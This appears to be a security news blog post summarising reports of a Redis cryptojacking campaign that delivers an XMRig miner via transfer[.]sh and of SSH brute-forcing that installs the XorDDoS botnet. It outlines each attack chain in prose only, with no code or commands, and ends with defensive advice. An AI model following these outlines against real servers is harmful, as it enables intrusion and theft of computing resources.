A recent report from Cado Security has revealed a new cryptojacking campaign that targets Redis database servers. The attackers are leveraging a legitimate and open-source command-line file transfer service, called transfer[.]sh, to carry out their attacks. According to the report, the command-line interactivity of transfer[.]sh makes it an ideal tool for hosting and delivering malicious payloads.
The attack begins by targeting insecure Redis deployments and registering a cron job that leads to arbitrary code execution when parsed by the scheduler. The job is designed to retrieve a payload hosted at transfer[.]sh. This payload is a script that sets up an XMRig cryptocurrency miner after freeing up memory, terminating competing miners, and installing a network scanner utility called pnscan to find vulnerable Redis servers and propagate the infection.
It's important to note that this attack method is not new. Other threat actors like TeamTNT and WatchDog have used similar mechanisms in their cryptojacking operations. However, the use of transfer[.]sh in this campaign is a novel development that enables the attackers to evade detection by other common code hosting domains, such as pastebin[.]com.
The campaign's objective is to hijack system resources for mining cryptocurrency. However, infection by this malware could have unintended effects. The report warns that reckless configuration of Linux memory management systems could easily result in data corruption or loss of system availability.
This attack on Redis servers is the latest in a series of threats that have affected the system, including Redigo and HeadCrab in recent months. In addition, Avertium has disclosed a new set of attacks in which SSH servers are brute-forced to deploy the XorDdos botnet malware on compromised servers. This attack aims to launch distributed denial-of-service (DDoS) attacks against targets located in China and the U.S.
Avertium has observed 1.2 million unauthorized SSH connection attempts across 18 honeypots between October and December 2022. It attributed the activity to a threat actor based in China. 42% of those attempts originated from 49 IP addresses assigned to ChinaNet Jiangsu Province Network, with the rest emanating from 8,000 IP addresses scattered worldwide.
Once the scanning identified an open port, it would be subject to a brute-force attack against the 'root' account using a list of approximately 17,000 passwords. Once the brute-force attack was successful, a XorDDoS bot was installed.
In conclusion, the use of transfer[.]sh in this cryptojacking campaign highlights the importance of securing Redis database servers. Organizations should regularly review their security measures to ensure their systems are properly configured and up-to-date. Additionally, the rise in SSH server brute-force attacks serves as a reminder of the importance of strong passwords and multi-factor authentication.
Thank you for reading our blog. Follow us on social media for more updates and feel free to contact us with any questions or comments. Share with your friends and family. We appreciate your support and look forward to sharing more valuable insights with you.